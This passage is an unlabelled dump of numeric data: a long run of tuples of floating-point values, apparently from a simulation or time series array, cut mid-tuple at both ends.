8.927491689038488, 7.096172454402028, 3.5068512477461056, 3.9696029133183646, 3.7115341049963386, 3.8880720858245827, 1.8947130793704727, 1.3424929098206355, 0.7816914246573948, 0.0, 9.738036490006762, 8.598605671231342, 6.712464549103178, 5.684139238111417, 7.7761441716491655, 5.196147746994874, 3.9696029133183646, 2.5048937483900753, 3.548086227201014, 2.97583056301283, 1.6634695651519613, 0.8818427335915264, 0.0), (10.149017837465571, 10.222556958952469, 8.765190532937382, 9.408346369659084, 7.479620910716259, 3.6957491269054237, 4.183154934806767, 3.910887907463277, 4.097441090977444, 1.996622358867072, 1.4148197692241535, 0.8237731189806353, 0.0, 10.262701812703709, 9.061504308786986, 7.074098846120767, 5.9898670766012145, 8.194882181954888, 5.475243070448588, 4.183154934806767, 2.6398208049324454, 3.7398104553581293, 3.136115456553029, 1.7530381065874767, 0.9293233599047701, 0.0), (10.663300349893618, 10.736378069917262, 9.205771911670025, 9.881403222864472, 7.8570345778125645, 3.8815821035518008, 4.393246331780179, 4.1070051790163955, 4.303412862923498, 2.096880722367466, 1.4859740070792353, 0.8651724542978865, 0.0, 10.778856575412524, 9.51689699727675, 7.429870035396177, 6.290642167102396, 8.606825725846996, 5.749807250622953, 4.393246331780179, 2.772558645394143, 3.9285172889062823, 3.2938010742881585, 1.841154382334005, 0.9760343699924785, 0.0), (11.167587436551466, 11.239619220007935, 9.637279371365155, 10.344716184059584, 8.226875492561113, 4.06358587021414, 4.59901256518501, 4.299079526001659, 4.5051402854596345, 2.195075543741104, 1.555662879247542, 0.9057191149969079, 0.0, 11.284377660319372, 9.962910264965986, 7.77831439623771, 6.5852266312233105, 9.010280570919269, 6.018711336402323, 4.59901256518501, 2.902561335867243, 4.113437746280557, 3.448238728019862, 1.9274558742730312, 1.021783565455267, 0.0), (11.65980652767195, 11.73016622683126, 10.05790032143018, 10.796339188649355, 8.587605691832056, 4.2409961194213395, 4.799589095967668, 4.486304554765035, 4.701776242382744, 2.2907941968574352, 1.6235936415907386, 0.9452427854654573, 0.0, 11.777141949610431, 10.397670640120028, 8.117968207953693, 6.872382590572304, 9.403552484765488, 6.280826376671049, 4.799589095967668, 3.029282942443814, 4.293802845916028, 3.598779729549786, 2.0115800642860364, 1.066378747893751, 0.0), (12.137885053487896, 12.205904907994013, 10.465822171272528, 11.234326172038713, 8.937687212495558, 4.413048543702297, 4.994111385074558, 4.667873871652484, 4.89247361748971, 2.3836240555859103, 1.6894735499704858, 0.9835731500912939, 0.0, 12.255026325471867, 10.81930465100423, 8.447367749852429, 7.150872166757729, 9.78494723497942, 6.535023420313477, 4.994111385074558, 3.152177531215927, 4.468843606247779, 3.744775390679572, 2.093164434254506, 1.1096277189085468, 0.0), (12.599750444232136, 12.664721081102966, 10.859232330299607, 11.656731069632603, 9.27558209142177, 4.578978835585919, 5.181714893452096, 4.842981083009976, 5.076385294577426, 2.4731524937959772, 1.7530098602484476, 1.0205398932621754, 0.0, 12.71590767008986, 11.225938825883926, 8.765049301242238, 7.41945748138793, 10.152770589154851, 6.780173516213966, 5.181714893452096, 3.270699168275656, 4.637791045710885, 3.8855770232108684, 2.1718464660599213, 1.1513382801002698, 0.0), (13.043330130137491, 13.104500563764889, 11.236318207918833, 12.061607816835945, 9.599752365480853, 4.7380226876011005, 5.361535082046684, 5.010819795183474, 5.252664157442781, 2.558966885357086, 1.8139098282862867, 1.0559726993658605, 0.0, 13.157662865650577, 11.615699693024464, 9.069549141431432, 7.676900656071258, 10.505328314885562, 7.015147713256865, 5.361535082046684, 3.3843019197150714, 4.799876182740427, 4.020535938945316, 2.247263641583767, 1.1913182330695355, 0.0), (13.466551541436809, 13.52312917358657, 11.595267213537621, 12.447010349053677, 9.908660071542968, 4.889415792276744, 5.532707411804733, 5.170583614518944, 5.420463089882663, 2.640654604138688, 1.8718807099456667, 1.0897012527901082, 0.0, 13.57816879434018, 11.986713780691188, 9.359403549728333, 7.921963812416063, 10.840926179765326, 7.238817060326522, 5.532707411804733, 3.4924398516262456, 4.954330035771484, 4.14900344968456, 2.3190534427075247, 1.229375379416961, 0.0), (13.8673421083629, 13.918492728174757, 11.934266756563387, 12.810992601690735, 10.200767246478268, 5.032393842141746, 5.694367343672649, 5.321466147362347, 5.578934975693962, 2.7178030240102293, 1.9266297610882495, 1.1215552379226759, 0.0, 13.975302338344855, 12.337107617149433, 9.633148805441246, 8.153409072030687, 11.157869951387925, 7.4500526063072865, 5.694367343672649, 3.5945670301012465, 5.100383623239134, 4.270330867230246, 2.3868533513126775, 1.26531752074316, 0.0), (14.243629261148602, 14.288477045136244, 12.251504246403549, 13.151608510152053, 10.474535927156907, 5.166192529725009, 5.845650338596845, 5.462661000059654, 5.727232698673564, 2.7899995188411624, 1.9778642375756985, 1.1513643391513229, 0.0, 14.346940379850777, 12.66500773066455, 9.889321187878492, 8.369998556523486, 11.454465397347128, 7.647725400083517, 5.845650338596845, 3.6901375212321494, 5.237267963578454, 4.383869503384019, 2.45030084928071, 1.2989524586487495, 0.0), (14.593340430026746, 14.630967942077797, 12.54516709246553, 13.466912009842552, 10.728428150449055, 5.2900475475554325, 5.9856918575237295, 5.593361778956831, 5.864509142618358, 2.856831462500934, 2.0252913952696763, 1.1789582408638082, 0.0, 14.690959801044102, 12.968540649501888, 10.12645697634838, 8.570494387502801, 11.729018285236716, 7.830706490539565, 5.9856918575237295, 3.778605391111023, 5.3642140752245275, 4.488970669947518, 2.509033418493106, 1.3300879947343454, 0.0), (14.914403045230168, 14.943851236606186, 12.813442704156724, 13.754957036167184, 10.960905953224861, 5.403194588161918, 6.1136273613997005, 5.7127620903998375, 5.989917191325237, 2.917886228858997, 2.0686184900318456, 1.2041666274478897, 0.0, 15.00523748411101, 13.245832901926784, 10.343092450159226, 8.753658686576989, 11.979834382650473, 7.997866926559773, 6.1136273613997005, 3.8594247058299413, 5.480452976612431, 4.584985678722395, 2.562688540831345, 1.3585319306005625, 0.0), (15.204744536991681, 15.225012746328195, 13.054518490884568, 14.013797524530858, 11.170431372354487, 5.504869344073363, 6.228592311171181, 5.820055540734641, 6.102609728591085, 2.972751191784799, 2.1075527777238703, 1.2268191832913256, 0.0, 15.287650311237673, 13.495011016204579, 10.53776388861935, 8.918253575354395, 12.20521945718217, 8.148077757028497, 6.228592311171181, 3.932049531480973, 5.585215686177244, 4.671265841510287, 2.6109036981769136, 1.384092067848018, 0.0), (15.46229233554412, 15.472338288850588, 13.266581862056471, 14.241487410338536, 11.355466444708094, 5.594307507818667, 6.329722167784569, 5.914435736307213, 6.201739638212791, 3.021013725147788, 2.141801514207413, 1.2467455927818742, 0.0, 15.536075164610265, 13.714201520600614, 10.709007571037066, 9.063041175443361, 12.403479276425582, 8.280210030830098, 6.329722167784569, 3.9959339341561906, 5.677733222354047, 4.747162470112846, 2.6533163724112945, 1.4065762080773265, 0.0), (15.684973871120327, 15.683713681780135, 13.447820227079841, 14.436080628995136, 11.514473207155827, 5.670744771926737, 6.416152392186281, 5.995096283463507, 6.286459803987251, 3.0622612028174157, 2.171071955344136, 1.2637755403072954, 0.0, 15.748388926414954, 13.901530943380248, 10.855359776720679, 9.186783608452245, 12.572919607974502, 8.39313479684891, 6.416152392186281, 4.050531979947669, 5.757236603577914, 4.812026876331712, 2.689564045415968, 1.4257921528891033, 0.0), (15.870716573953118, 15.857024742723624, 13.596420995362104, 14.59563111590558, 11.645913696567856, 5.733416828926462, 6.4870184453227155, 6.061230788549498, 6.355923109711349, 3.0960809986631324, 2.1950713569957014, 1.2777387102553464, 0.0, 15.922468478837914, 14.055125812808807, 10.975356784978505, 9.288242995989394, 12.711846219422698, 8.485723103969297, 6.4870184453227155, 4.095297734947473, 5.822956848283928, 4.865210371968527, 2.7192841990724212, 1.441547703883966, 0.0), (16.01744787427533, 15.990157289287811, 13.710571576310672, 14.718192806474825, 11.748249949814339, 5.781559371346751, 6.54145578814029, 6.112032857911145, 6.409282439181973, 3.1220604865543846, 2.213506975023774, 1.2884647870137858, 0.0, 16.05619070406532, 14.17311265715164, 11.067534875118868, 9.366181459663151, 12.818564878363945, 8.556846001075604, 6.54145578814029, 4.129685265247679, 5.874124974907169, 4.9060642688249425, 2.7421143152621346, 1.4536506626625285, 0.0), (16.123095202319785, 16.080997139079486, 13.78845937933296, 14.801819636107783, 11.819944003765428, 5.8144080917165, 6.578599881585408, 6.1466960978944165, 6.445690676196012, 3.139787040360623, 2.226086065290016, 1.2957834549703726, 0.0, 16.147432484283325, 14.253618004674097, 11.13043032645008, 9.419361121081867, 12.891381352392024, 8.605374537052183, 6.578599881585408, 4.153148636940357, 5.909972001882714, 4.933939878702596, 2.757691875866592, 1.461908830825408, 0.0), (16.18558598831933, 16.12743010970541, 13.82827181383638, 14.844565540209405, 11.85945789529128, 5.83119868256461, 6.59758618660448, 6.164414114845277, 6.464300704550355, 3.148848033951298, 2.232515883656091, 1.2995243985128655, 0.0, 16.194070701678125, 14.294768383641518, 11.162579418280455, 9.446544101853892, 12.92860140910071, 8.630179760783388, 6.59758618660448, 4.1651419161175784, 5.92972894764564, 4.948188513403136, 2.7656543627672763, 1.4661300099732195, 0.0), (16.208629381348224, 16.132927937814358, 13.83323090992227, 14.849916975308645, 11.869580859768103, 5.833333333333334, 6.599843201807471, 6.166329218106997, 6.466627325102881, 3.149916909007774, 2.233322143243131, 1.2999863435451913, 0.0, 16.2, 14.299849778997103, 11.166610716215654, 9.44975072702332, 12.933254650205763, 8.632860905349796, 6.599843201807471, 4.166666666666667, 5.9347904298840515, 4.949972325102882, 2.7666461819844543, 1.4666298125285782, 0.0), (16.225619860854646, 16.12972098765432, 13.832419753086421, 14.849258333333335, 11.875314787855842, 5.833333333333334, 6.598603050108934, 6.163666666666667, 6.466315555555555, 3.149260246913581, 2.2332332210998884, 1.2998781893004117, 0.0, 16.2, 14.298660082304526, 11.166166105499443, 9.44778074074074, 12.93263111111111, 8.629133333333334, 6.598603050108934, 4.166666666666667, 5.937657393927921, 4.949752777777779, 2.7664839506172845, 1.4663382716049385, 0.0), (16.242251568338528, 16.1233996342021, 13.830818472793784, 14.847955246913582, 11.880922608634137, 5.833333333333334, 6.596159122085048, 6.158436213991771, 6.465699588477367, 3.1479675354366723, 2.233056906513697, 1.2996646852613931, 0.0, 16.2, 14.296311537875322, 11.165284532568485, 9.443902606310015, 12.931399176954734, 8.62181069958848, 6.596159122085048, 4.166666666666667, 5.940461304317068, 4.949318415637862, 2.766163694558757, 1.4657636031092822, 0.0), (16.258523230476854, 16.114060448102425, 13.828449016918157, 14.846022530864197, 11.886404126315846, 5.833333333333334, 6.592549374646977, 6.150736625514405, 6.46478732510288, 3.146060283493371, 2.2327947956935614, 1.2993487578113097, 0.0, 16.2, 14.292836335924404, 11.163973978467807, 9.43818085048011, 12.92957465020576, 8.611031275720167, 6.592549374646977, 4.166666666666667, 5.943202063157923, 4.948674176954733, 2.7656898033836312, 1.46491458619113, 0.0), (16.27443357394662, 16.1018, 13.825333333333333, 14.843475, 11.891759145113827, 5.833333333333334, 6.587811764705883, 6.140666666666667, 6.463586666666666, 3.143560000000001, 2.232448484848485, 1.2989333333333337, 0.0, 16.2, 14.288266666666669, 11.162242424242425, 9.430679999999999, 12.927173333333332, 8.596933333333334, 6.587811764705883, 4.166666666666667, 5.945879572556914, 4.947825000000001, 2.765066666666667, 1.4638000000000002, 0.0), (16.2899813254248, 16.08671486053955, 13.821493369913123, 14.840327469135804, 11.896987469240962, 5.833333333333334, 6.581984249172921, 6.12832510288066, 6.462105514403292, 3.140488193872886, 2.232019570187472, 1.2984213382106389, 0.0, 16.2, 14.282634720317025, 11.160097850937358, 9.421464581618656, 12.924211028806583, 8.579655144032923, 6.581984249172921, 4.166666666666667, 5.948493734620481, 4.946775823045269, 2.764298673982625, 1.462428623685414, 0.0), (16.3051652115884, 16.0689016003658, 13.816951074531323, 14.83659475308642, 11.902088902910101, 5.833333333333334, 6.575104784959253, 6.113810699588477, 6.460351769547325, 3.1368663740283504, 2.2315096479195247, 1.2978156988263985, 0.0, 16.2, 14.27597268709038, 11.157548239597624, 9.41059912208505, 12.92070353909465, 8.559334979423868, 6.575104784959253, 4.166666666666667, 5.951044451455051, 4.945531584362141, 2.763390214906265, 1.460809236396891, 0.0), (16.319983959114396, 16.04845679012346, 13.811728395061728, 14.832291666666666, 11.907063250334119, 5.833333333333334, 6.567211328976035, 6.097222222222222, 6.458333333333333, 3.1327160493827173, 2.230920314253648, 1.297119341563786, 0.0, 16.2, 14.268312757201645, 11.15460157126824, 9.398148148148149, 12.916666666666666, 8.536111111111111, 6.567211328976035, 4.166666666666667, 5.953531625167059, 4.944097222222223, 2.7623456790123457, 1.458950617283951, 0.0), (16.334436294679772, 16.02547700045725, 13.805847279378145, 14.82743302469136, 11.911910315725876, 5.833333333333334, 6.558341838134432, 6.078658436213992, 6.456058106995885, 3.1280587288523103, 2.2302531653988447, 1.296335192805975, 0.0, 16.2, 14.259687120865724, 11.151265826994223, 9.384176186556928, 12.91211621399177, 8.510121810699589, 6.558341838134432, 4.166666666666667, 5.955955157862938, 4.942477674897121, 2.761169455875629, 1.4568615454961138, 0.0), (16.34852094496153, 16.00005880201189, 13.799329675354366, 14.82203364197531, 11.916629903298237, 5.833333333333334, 6.548534269345599, 6.058218106995886, 6.453533991769548, 3.1229159213534534, 2.229509797564119, 1.2954661789361381, 0.0, 16.2, 14.250127968297518, 11.147548987820594, 9.368747764060357, 12.907067983539095, 8.48150534979424, 6.548534269345599, 4.166666666666667, 5.958314951649118, 4.940677880658438, 2.759865935070873, 1.4545508001828993, 0.0), (16.362236636636634, 15.972298765432097, 13.792197530864199, 14.816108333333332, 11.921221817264065, 5.833333333333334, 6.537826579520697, 6.0360000000000005, 6.450768888888889, 3.1173091358024703, 2.228691806958474, 1.2945152263374486, 0.0, 16.2, 14.239667489711932, 11.143459034792368, 9.351927407407409, 12.901537777777778, 8.450400000000002, 6.537826579520697, 4.166666666666667, 5.960610908632033, 4.938702777777778, 2.75843950617284, 1.452027160493827, 0.0), (16.375582096382097, 15.942293461362596, 13.784472793781436, 14.809671913580248, 11.92568586183623, 5.833333333333334, 6.526256725570888, 6.012102880658436, 6.447770699588479, 3.111259881115685, 2.2278007897909133, 1.2934852613930805, 0.0, 16.2, 14.228337875323884, 11.139003948954567, 9.333779643347052, 12.895541399176958, 8.41694403292181, 6.526256725570888, 4.166666666666667, 5.962842930918115, 4.93655730452675, 2.7568945587562874, 1.449299405578418, 0.0), (16.388556050874893, 15.9101394604481, 13.776177411979882, 14.802739197530864, 11.930021841227594, 5.833333333333334, 6.513862664407327, 5.986625514403293, 6.4445473251028815, 3.1047896662094203, 2.226838342270441, 1.2923792104862066, 0.0, 16.2, 14.216171315348271, 11.134191711352205, 9.314368998628257, 12.889094650205763, 8.381275720164611, 6.513862664407327, 4.166666666666667, 5.965010920613797, 4.934246399176955, 2.755235482395977, 1.4463763145861912, 0.0), (16.40115722679201, 15.87593333333333, 13.767333333333335, 14.795325, 11.934229559651024, 5.833333333333334, 6.500682352941176, 5.959666666666668, 6.441106666666666, 3.097920000000001, 2.225806060606061, 1.2912000000000003, 0.0, 16.2, 14.203200000000002, 11.129030303030303, 9.29376, 12.882213333333333, 8.343533333333335, 6.500682352941176, 4.166666666666667, 5.967114779825512, 4.931775000000001, 2.753466666666667, 1.4432666666666667, 0.0), (16.41338435081044, 15.839771650663007, 13.757962505715593, 14.78744413580247, 11.938308821319383, 5.833333333333334, 6.486753748083595, 5.931325102880659, 6.437456625514404, 3.090672391403751, 2.2247055410067764, 1.2899505563176348, 0.0, 16.2, 14.18945611949398, 11.123527705033881, 9.27201717421125, 12.874913251028808, 8.303855144032923, 6.486753748083595, 4.166666666666667, 5.969154410659692, 4.929148045267491, 2.751592501143119, 1.4399792409693644, 0.0), (16.425236149607162, 15.801750983081849, 13.748086877000459, 14.77911141975309, 11.942259430445535, 5.833333333333334, 6.4721148067457435, 5.901699588477367, 6.433605102880659, 3.0830683493369926, 2.22353837968159, 1.2886338058222835, 0.0, 16.2, 14.174971864045116, 11.11769189840795, 9.249205048010975, 12.867210205761317, 8.262379423868314, 6.4721148067457435, 4.166666666666667, 5.971129715222768, 4.926370473251031, 2.7496173754000917, 1.4365228166438047, 0.0), (16.436711349859177, 15.761967901234568, 13.737728395061731, 14.770341666666667, 11.94608119124235, 5.833333333333334, 6.456803485838781, 5.8708888888888895, 6.42956, 3.0751293827160504, 2.2223061728395064, 1.2872526748971194, 0.0, 16.2, 14.159779423868311, 11.111530864197531, 9.225388148148149, 12.85912, 8.219244444444445, 6.456803485838781, 4.166666666666667, 5.973040595621175, 4.923447222222223, 2.7475456790123465, 1.4329061728395065, 0.0), (16.44780867824346, 15.720518975765888, 13.726909007773205, 14.761149691358025, 11.949773907922687, 5.833333333333334, 6.440857742273865, 5.838991769547327, 6.425329218106996, 3.0668770004572488, 2.2210105166895295, 1.2858100899253166, 0.0, 16.2, 14.143910989178481, 11.105052583447646, 9.200631001371743, 12.850658436213992, 8.174588477366258, 6.440857742273865, 4.166666666666667, 5.974886953961343, 4.920383230452676, 2.745381801554641, 1.42913808870599, 0.0), (16.458526861437004, 15.677500777320528, 13.71565066300869, 14.751550308641978, 11.953337384699417, 5.833333333333334, 6.424315532962156, 5.806106995884774, 6.420920658436214, 3.05833271147691, 2.2196530074406624, 1.2843089772900476, 0.0, 16.2, 14.12739875019052, 11.09826503720331, 9.174998134430727, 12.841841316872427, 8.128549794238685, 6.424315532962156, 4.166666666666667, 5.976668692349708, 4.9171834362139935, 2.743130132601738, 1.4252273433927756, 0.0), (16.4688646261168, 15.633009876543213, 13.70397530864198, 14.741558333333336, 11.956771425785394, 5.833333333333334, 6.4072148148148145, 5.772333333333334, 6.416342222222223, 3.049518024691359, 2.2182352413019086, 1.282752263374486, 0.0, 16.2, 14.110274897119341, 11.091176206509541, 9.148554074074074, 12.832684444444446, 8.081266666666668, 6.4072148148148145, 4.166666666666667, 5.978385712892697, 4.913852777777779, 2.740795061728396, 1.421182716049383, 0.0), (16.47882069895983, 15.587142844078647, 13.69190489254687, 14.731188580246915, 11.960075835393496, 5.833333333333334, 6.389593544743001, 5.737769547325104, 6.4116018106995885, 3.040454449016919, 2.2167588144822714, 1.281142874561805, 0.0, 16.2, 14.092571620179852, 11.083794072411356, 9.121363347050755, 12.823203621399177, 8.032877366255146, 6.389593544743001, 4.166666666666667, 5.980037917696748, 4.9103961934156395, 2.738380978509374, 1.4170129858253318, 0.0), (16.488393806643085, 15.539996250571559, 13.679461362597166, 14.720455864197532, 11.963250417736582, 5.833333333333334, 6.371489679657872, 5.702514403292183, 6.4067073251028805, 3.031163493369914, 2.2152253231907557, 1.279483737235178, 0.0, 16.2, 14.074321109586954, 11.076126615953777, 9.09349048010974, 12.813414650205761, 7.983520164609057, 6.371489679657872, 4.166666666666667, 5.981625208868291, 4.906818621399179, 2.7358922725194335, 1.4127269318701419, 0.0), (16.497582675843546, 15.491666666666667, 13.66666666666667, 14.709375000000001, 11.966294977027516, 5.833333333333334, 6.352941176470589, 5.666666666666668, 6.4016666666666655, 3.021666666666668, 2.213636363636364, 1.277777777777778, 0.0, 16.2, 14.055555555555554, 11.068181818181818, 9.065000000000001, 12.803333333333331, 7.9333333333333345, 6.352941176470589, 4.166666666666667, 5.983147488513758, 4.903125000000001, 2.733333333333334, 1.4083333333333337, 0.0), (16.50638603323821, 15.442250663008686, 13.653542752629173, 14.697960802469137, 11.969209317479164, 5.833333333333334, 6.333985992092311, 5.63032510288066, 6.396487736625514, 3.0119854778235036, 2.2119935320281, 1.2760279225727789, 0.0, 16.2, 14.036307148300564, 11.059967660140499, 9.035956433470508, 12.792975473251028, 7.882455144032924, 6.333985992092311, 4.166666666666667, 5.984604658739582, 4.899320267489713, 2.730708550525835, 1.4038409693644263, 0.0), (16.514802605504055, 15.391844810242342, 13.640111568358483, 14.686228086419753, 11.971993243304391, 5.833333333333334, 6.3146620834341975, 5.593588477366255, 6.391178436213992, 3.0021414357567453, 2.210298424574968, 1.2742370980033535, 0.0, 16.2, 14.016608078036885, 11.051492122874839, 9.006424307270233, 12.782356872427984, 7.831023868312758, 6.3146620834341975, 4.166666666666667, 5.985996621652196, 4.895409362139919, 2.728022313671697, 1.3992586191129404, 0.0), (16.522831119318074, 15.340545679012347, 13.626395061728397, 14.674191666666669, 11.974646558716064, 5.833333333333334, 6.295007407407407, 5.556555555555557, 6.385746666666667, 2.9921560493827166, 2.208552637485971, 1.272408230452675, 0.0, 16.2, 13.996490534979422, 11.042763187429854, 8.976468148148149, 12.771493333333334, 7.77917777777778, 6.295007407407407, 4.166666666666667, 5.987323279358032, 4.891397222222224, 2.7252790123456796, 1.3945950617283953, 0.0), (16.53047030135726, 15.288449839963418, 13.612415180612713, 14.661866358024692, 11.977169067927047, 5.833333333333334, 6.275059920923102, 5.519325102880659, 6.380200329218106, 2.982050827617742, 2.2067577669701133, 1.2705442463039174, 0.0, 16.2, 13.97598670934309, 11.033788834850565, 8.946152482853226, 12.760400658436213, 7.727055144032923, 6.275059920923102, 4.166666666666667, 5.9885845339635235, 4.887288786008232, 2.7224830361225427, 1.389859076360311, 0.0), (16.537718878298588, 15.235653863740286, 13.598193872885233, 14.649266975308642, 11.979560575150202, 5.833333333333334, 6.25485758089244, 5.481995884773663, 6.3745473251028795, 2.971847279378144, 2.204915409236397, 1.2686480719402533, 0.0, 16.2, 13.955128791342785, 11.024577046181985, 8.91554183813443, 12.749094650205759, 7.674794238683129, 6.25485758089244, 4.166666666666667, 5.989780287575101, 4.883088991769548, 2.7196387745770467, 1.385059442158208, 0.0), (16.544575576819057, 15.182254320987655, 13.583753086419755, 14.636408333333335, 11.981820884598399, 5.833333333333334, 6.23443834422658, 5.4446666666666665, 6.368795555555556, 2.9615669135802474, 2.2030271604938276, 1.2667226337448563, 0.0, 16.2, 13.933948971193416, 11.015135802469137, 8.88470074074074, 12.737591111111112, 7.622533333333334, 6.23443834422658, 4.166666666666667, 5.9909104422991994, 4.878802777777779, 2.716750617283951, 1.380204938271605, 0.0), (16.551039123595647, 15.128347782350252, 13.56911476909008, 14.623305246913581, 11.983949800484496, 5.833333333333334, 6.213840167836683, 5.407436213991769, 6.3629529218107, 2.9512312391403754, 2.2010946169514076, 1.2647708581008996, 0.0, 16.2, 13.912479439109894, 11.005473084757037, 8.853693717421125, 12.7259058436214, 7.570410699588477, 6.213840167836683, 4.166666666666667, 5.991974900242248, 4.874435082304528, 2.713822953818016, 1.3753043438500232, 0.0), (16.55710824530535, 15.074030818472796, 13.554300868770008, 14.609972530864198, 11.985947127021364, 5.833333333333334, 6.1931010086339064, 5.370403292181071, 6.357027325102881, 2.940861764974852, 2.1991193748181406, 1.2627956713915565, 0.0, 16.2, 13.890752385307119, 10.995596874090701, 8.822585294924554, 12.714054650205762, 7.518564609053499, 6.1931010086339064, 4.166666666666667, 5.992973563510682, 4.8699908436214, 2.710860173754002, 1.3703664380429816, 0.0), (16.562781668625146, 15.019400000000001, 13.539333333333333, 14.596425, 11.987812668421869, 5.833333333333334, 6.172258823529412, 5.333666666666667, 6.351026666666667, 2.9304800000000006, 2.19710303030303, 1.2608000000000001, 0.0, 16.2, 13.8688, 10.98551515151515, 8.791440000000001, 12.702053333333334, 7.467133333333333, 6.172258823529412, 4.166666666666667, 5.993906334210934, 4.865475000000001, 2.707866666666667, 1.3654000000000004, 0.0), (16.568058120232035, 14.964551897576587, 13.524234110653865, 14.582677469135803, 11.989546228898869, 5.833333333333334, 6.151351569434358, 5.2973251028806585, 6.344958847736625, 2.9201074531321454, 2.1950471796150812, 1.2587867703094042, 0.0, 16.2, 13.846654473403445, 10.975235898075404, 8.760322359396435, 12.68991769547325, 7.416255144032922, 6.151351569434358, 4.166666666666667, 5.994773114449434, 4.860892489711935, 2.704846822130773, 1.360413808870599, 0.0), (16.572936326802996, 14.909583081847279, 13.509025148605396, 14.56874475308642, 11.991147612665237, 5.833333333333334, 6.130417203259905, 5.261477366255145, 6.338831769547324, 2.9097656332876096, 2.1929534189632958, 1.2567589087029418, 0.0, 16.2, 13.824347995732358, 10.964767094816478, 8.729296899862828, 12.677663539094649, 7.366068312757203, 6.130417203259905, 4.166666666666667, 5.995573806332619, 4.856248251028807, 2.7018050297210796, 1.3554166438042983, 0.0), (16.577415015015013, 14.85459012345679, 13.493728395061732, 14.554641666666669, 11.99261662393383, 5.833333333333334, 6.109493681917211, 5.226222222222224, 6.332653333333334, 2.899476049382717, 2.1908233445566783, 1.254719341563786, 0.0, 16.2, 13.801912757201645, 10.95411672278339, 8.69842814814815, 12.665306666666668, 7.316711111111113, 6.109493681917211, 4.166666666666667, 5.996308311966915, 4.851547222222224, 2.6987456790123465, 1.3504172839506174, 0.0), (16.581492911545087, 14.79966959304984, 13.478365797896664, 14.540383024691359, 11.99395306691752, 5.833333333333334, 6.088618962317438, 5.191658436213992, 6.326431440329218, 2.8892602103337914, 2.1886585526042324, 1.2526709952751107, 0.0, 16.2, 13.779380948026215, 10.943292763021162, 8.667780631001373, 12.652862880658436, 7.2683218106995895, 6.088618962317438, 4.166666666666667, 5.99697653345876, 4.846794341563787, 2.695673159579333, 1.3454245084590766, 0.0), (16.585168743070195, 14.744918061271147, 13.462959304983997, 14.525983641975309, 11.995156745829167, 5.833333333333334, 6.067831001371743, 5.157884773662552, 6.320173991769548, 2.879139625057157, 2.1864606393149604, 1.2506167962200887, 0.0, 16.2, 13.756784758420972, 10.9323031965748, 8.63741887517147, 12.640347983539096, 7.221038683127573, 6.067831001371743, 4.166666666666667, 5.9975783729145835, 4.841994547325104, 2.6925918609968, 1.3404470964791952, 0.0), (16.588441236267325, 14.690432098765434, 13.44753086419753, 14.511458333333334, 11.996227464881638, 5.833333333333334, 6.0471677559912855, 5.125000000000001, 6.31388888888889, 2.8691358024691365, 2.184231200897868, 1.2485596707818931, 0.0, 16.2, 13.734156378600822, 10.921156004489339, 8.607407407407408, 12.62777777777778, 7.175000000000001, 6.0471677559912855, 4.166666666666667, 5.998113732440819, 4.837152777777779, 2.6895061728395064, 1.3354938271604941, 0.0), (16.591309117813463, 14.636308276177413, 13.432102423411067, 14.496821913580249, 11.997165028287798, 5.833333333333334, 6.026667183087227, 5.093102880658437, 6.3075840329218105, 2.8592702514860546, 2.1819718335619576, 1.246502545343698, 0.0, 16.2, 13.711527998780674, 10.909859167809786, 8.577810754458163, 12.615168065843621, 7.130344032921811, 6.026667183087227, 4.166666666666667, 5.998582514143899, 4.832273971193417, 2.6864204846822135, 1.3305734796524924, 0.0), (16.593771114385607, 14.582643164151806, 13.416695930498403, 14.482089197530867, 11.997969240260517, 5.833333333333334, 6.006367239570725, 5.062292181069959, 6.301267325102881, 2.849564481024235, 2.1796841335162327, 1.2444483462886757, 0.0, 16.2, 13.68893180917543, 10.898420667581162, 8.548693443072704, 12.602534650205762, 7.0872090534979435, 6.006367239570725, 4.166666666666667, 5.998984620130258, 4.827363065843623, 2.6833391860996807, 1.3256948331047098, 0.0), (16.595825952660736, 14.529533333333333, 13.401333333333335, 14.467275000000003, 11.998639905012647, 5.833333333333334, 5.986305882352941, 5.0326666666666675, 6.294946666666666, 2.8400400000000006, 2.1773696969696976, 1.2424000000000002, 0.0, 16.2, 13.6664, 10.886848484848487, 8.52012, 12.589893333333332, 7.045733333333335, 5.986305882352941, 4.166666666666667, 5.999319952506323, 4.822425000000002, 2.6802666666666672, 1.3208666666666669, 0.0), (16.597472359315837, 14.477075354366713, 13.386036579789668, 14.452394135802471, 11.999176826757065, 5.833333333333334, 5.966521068345034, 5.004325102880659, 6.288629958847737, 2.830718317329676, 2.1750301201313547, 1.2403604328608446, 0.0, 16.2, 13.64396476146929, 10.875150600656774, 8.492154951989026, 12.577259917695473, 7.006055144032923, 5.966521068345034, 4.166666666666667, 5.999588413378532, 4.817464711934158, 2.6772073159579337, 1.316097759487883, 0.0), (16.5987090610279, 14.425365797896662, 13.370827617741199, 14.437461419753088, 11.999579809706631, 5.833333333333334, 5.947050754458163, 4.977366255144033, 6.282325102880659, 2.8216209419295843, 2.1726669992102097, 1.238332571254382, 0.0, 16.2, 13.6216582837982, 10.863334996051048, 8.464862825788751, 12.564650205761318, 6.968312757201646, 5.947050754458163, 4.166666666666667, 5.999789904853316, 4.812487139917697, 2.67416552354824, 1.3113968907178786, 0.0), (16.599534784473914, 14.374501234567903, 13.35572839506173, 14.422491666666668, 11.99984865807421, 5.833333333333334, 5.927932897603486, 4.95188888888889, 6.27604, 2.81276938271605, 2.170281930415264, 1.2363193415637863, 0.0, 16.2, 13.599512757201648, 10.851409652076319, 8.438308148148149, 12.55208, 6.932644444444446, 5.927932897603486, 4.166666666666667, 5.999924329037105, 4.807497222222223, 2.6711456790123465, 1.3067728395061733, 0.0), (16.59994825633087, 14.324578235025148, 13.340760859625059, 14.407499691358025, 11.999983176072671, 5.833333333333334, 5.909205454692165, 4.927991769547327, 6.269782551440329, 2.8041851486053964, 2.1678765099555233, 1.23432367017223, 0.0, 16.2, 13.577560371894528, 10.839382549777614, 8.412555445816189, 12.539565102880658, 6.899188477366257, 5.909205454692165, 4.166666666666667, 5.999991588036336, 4.802499897119342, 2.6681521719250116, 1.3022343850022864, 0.0), (16.59966658316932, 14.275431337669806, 13.325874599908552, 14.39237008856683, 11.999869818983834, 5.833225077478026, 5.890812155863717, 4.905562566681908, 6.263513519280598, 2.795848176658867, 2.1654095969441007, 1.2323373362532992, 0.0, 16.19980024005487, 13.555710698786289, 10.827047984720503, 8.3875445299766, 12.527027038561195, 6.867787593354672, 5.890812155863717, 4.166589341055733, 5.999934909491917, 4.797456696188944, 2.6651749199817103, 1.29776648524271, 0.0), (16.597026731078905, 14.22556009557945, 13.310651234567901, 14.376340217391304, 11.998838053740013, 